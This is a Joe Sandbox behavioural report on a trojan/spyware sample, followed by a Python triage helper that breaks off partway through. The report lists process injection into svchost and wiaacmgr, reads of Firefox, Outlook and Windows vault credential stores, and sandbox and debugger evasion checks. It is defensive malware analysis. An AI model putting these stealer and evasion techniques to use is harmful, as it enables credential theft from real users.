                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 0472F290 appears 103 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 0469B970 appears 262 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 046F7E54 appears 107 times
                Source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003553000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3HnH4uJtE7.exe
                Source: 3HnH4uJtE7.exe, 00000000.00000003.1740885152.00000000036FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3HnH4uJtE7.exe
                Source: 3HnH4uJtE7.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/11
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009537B5 GetLastError,FormatMessageW,0_2_009537B5
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009410BF AdjustTokenPrivileges,CloseHandle,0_2_009410BF
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009416C3
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_009551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009551CD
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0096A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0096A67C
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0095648E
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008E42A2
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeFile created: C:\Users\user\AppData\Local\Temp\aut9A1F.tmpJump to behavior
                Source: 3HnH4uJtE7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009E9000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.0000000000A0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 3HnH4uJtE7.exeVirustotal: Detection: 69%
                Source: 3HnH4uJtE7.exeReversingLabs: Detection: 78%
                Source: unknownProcess created: C:\Users\user\Desktop\3HnH4uJtE7.exe "C:\Users\user\Desktop\3HnH4uJtE7.exe"
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3HnH4uJtE7.exe"
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeProcess created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3HnH4uJtE7.exe"Jump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeProcess created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: scansetting.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 3HnH4uJtE7.exeStatic file information: File size 1401344 > 1048576
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 3HnH4uJtE7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wdFhguqpcrad.exe, 00000003.00000002.3560021834.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3560022524.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003430000.00000004.00001000.00020000.00000000.sdmp, 3HnH4uJtE7.exe, 00000000.00000003.1742033212.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1866930699.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868964920.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.000000000349E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.000000000480E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1962662464.000000000431B000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1964647387.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.0000000004670000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 3HnH4uJtE7.exe, 00000000.00000003.1741115369.0000000003430000.00000004.00001000.00020000.00000000.sdmp, 3HnH4uJtE7.exe, 00000000.00000003.1742033212.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1963011131.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1866930699.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868964920.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1963011131.000000000349E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, wiaacmgr.exe, 00000006.00000002.3561222792.000000000480E000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1962662464.000000000431B000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000003.1964647387.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3561222792.0000000004670000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdbGCTL source: svchost.exe, 00000001.00000003.1930867669.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1930942129.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560592056.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdb source: svchost.exe, 00000001.00000003.1930867669.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1930942129.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560592056.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2028220729.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2247814449.00000000170EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000004C9C000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2028220729.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2247814449.00000000170EC000.00000004.80000000.00040000.00000000.sdmp
                Source: 3HnH4uJtE7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 3HnH4uJtE7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 3HnH4uJtE7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 3HnH4uJtE7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 3HnH4uJtE7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe | Code function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe | Code function: 0_2_00900A76 push ecx; ret | 0_2_00900A89
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A07C push ecx; iretd | 1_2_0041A07D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00407174 push ss; ret | 1_2_00407192
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00405133 pushfd ; retf | 1_2_00405135
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041A9F3 push edi; retf | 1_2_0041A9FE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040AAE5 push es; ret | 1_2_0040AAE8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403290 push eax; ret | 1_2_00403292
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D3B2 pushad ; retf | 1_2_0040D3B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417609 push eax; retf | 1_2_0041760A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004127CA push ebx; iretd | 1_2_004127CB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0330225F pushad ; ret | 1_2_033027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033027FA pushad ; ret | 1_2_033027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033309AD push ecx; mov dword ptr [esp], ecx | 1_2_033309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0330283D push eax; iretd | 1_2_03302858
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_046727FA pushad ; ret | 6_2_046727F9
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_0467225F pushad ; ret | 6_2_046727F9
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_0467283D push eax; iretd | 6_2_04672858
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_046A09AD push ecx; mov dword ptr [esp], ecx | 6_2_046A09B6
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_0467135F push eax; iretd | 6_2_04671369
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_00694376 push eax; retf | 6_2_00694377
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_0069288C push ebx; ret | 6_2_0069288D
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_00696DE9 push ecx; iretd | 6_2_00696DEA
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_00694E70 push ss; retn 6E14h | 6_2_00694F22
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_0068F537 push ebx; iretd | 6_2_0068F538
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_00697760 push edi; retf | 6_2_0069776B
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_0069775B push edi; retf | 6_2_0069776B
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_00687852 push es; ret | 6_2_00687855
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_00683EE1 push ss; ret | 6_2_00683EFF
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_00681EA0 pushfd ; retf | 6_2_00681EA2
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_0069BE95 pushad ; ret | 6_2_0069BEAB
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Code function: 6_2_0456B5FD push esi; ret | 6_2_0456B5FF
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe | Code function: 0_2_008FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe | Code function: 0_2_00971C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wiaacmgr.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	API/Special instruction interceptor: Address: BE29DC
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0337096E rdtsc
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	API coverage: 3.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\wiaacmgr.exe	API coverage: 2.6 %
Source: C:\Windows\SysWOW64\wiaacmgr.exe	TID: 6968	Thread sleep count: 45 > 30
Source: C:\Windows\SysWOW64\wiaacmgr.exe	TID: 6968	Thread sleep time: -90000s >= -30000s
Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe	TID: 7144	Thread sleep time: -65000s >= -30000s
Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe	TID: 7144	Thread sleep time: -43500s >= -30000s
Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe	TID: 7144	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Last function: Thread delayed (2 occurrences)
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_009568EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_00955C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 6_2_0069C9D0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe	Code function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: wiaacmgr.exe, 00000006.00000002.3560220883.000000000098F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
Source: wdFhguqpcrad.exe, 00000007.00000002.3560526004.0000000001310000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2251604417.00000259570EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
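Triage helper, added here as an example and not part of the Joe Sandbox report: it parses the evasion rows of this section as they come out of the HTML table (cell text run together, "Jump to behavior" link text attached) into records and groups the evidence per process. SAMPLE_ROWS are copied from this report; the 5 % API-coverage floor and the tactic names are this example's own heuristics, not Joe Sandbox thresholds. The sleep rows carry negative values, matching the NT convention for relative waits, and the printed comparison "-90000s >= -30000s" only makes sense on magnitudes, so the code compares absolute values and leaves the unit as reported.

```python
"""Triage of flattened Joe Sandbox evasion rows (added example, not report code)."""
import re
from collections import defaultdict

# Raw rows as copied from this report's HTML table: the cell text runs together
# ("...exeCode function:") and the "Jump to behavior" link text is attached.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\3HnH4uJtE7.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98133",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0337096E rdtsc 1_2_0337096E",
    r"Source: C:\Users\user\Desktop\3HnH4uJtE7.exeAPI coverage: 3.9 %",
    r"Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %",
    r"Source: C:\Windows\SysWOW64\wiaacmgr.exeAPI coverage: 2.6 %",
    r"Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 6968Thread sleep count: 45 > 30Jump to behavior",
    r"Source: C:\Windows\SysWOW64\wiaacmgr.exe TID: 6968Thread sleep time: -90000s >= -30000sJump to behavior",
    r"Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe TID: 7144Thread sleep time: -65000s >= -30000sJump to behavior",
    r"Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00959B2B",
    r"Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E42DE",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]1_2_0336A30B",
    r"Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior",
]

ROW_RE = re.compile(r"^Source:\s*(?P<src>.*?\.exe)\s*(?P<rest>.*)$")
PATTERNS = {  # tried in order; the first match decides the row kind
    "code": re.compile(r"Code function:\s*(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s*(?P<body>.*?),?\s*(?P=fid)$"),
    "sleep_time": re.compile(r"TID:\s*(?P<tid>\d+)\s*Thread sleep time:\s*(?P<val>-?\d+)s\s*>=\s*(?P<thr>-?\d+)s"),
    "sleep_count": re.compile(r"TID:\s*(?P<tid>\d+)\s*Thread sleep count:\s*(?P<val>\d+)\s*>\s*(?P<thr>\d+)"),
    "coverage": re.compile(r"API coverage:\s*(?P<pct>\d+(?:\.\d+)?)\s*%"),
    "sandbox": re.compile(r"Sandbox detection routine:\s*(?P<chain>.*?)\s*(?:graph_\S*)?$"),
    "query": re.compile(r"Process queried:\s*(?P<info>\w+)"),
}
INT_KEYS = {"tid", "val", "thr"}  # only these are numeric; function ids stay strings


def parse_row(row):
    """Split one report row into a dict, or return None if it is not a Source row."""
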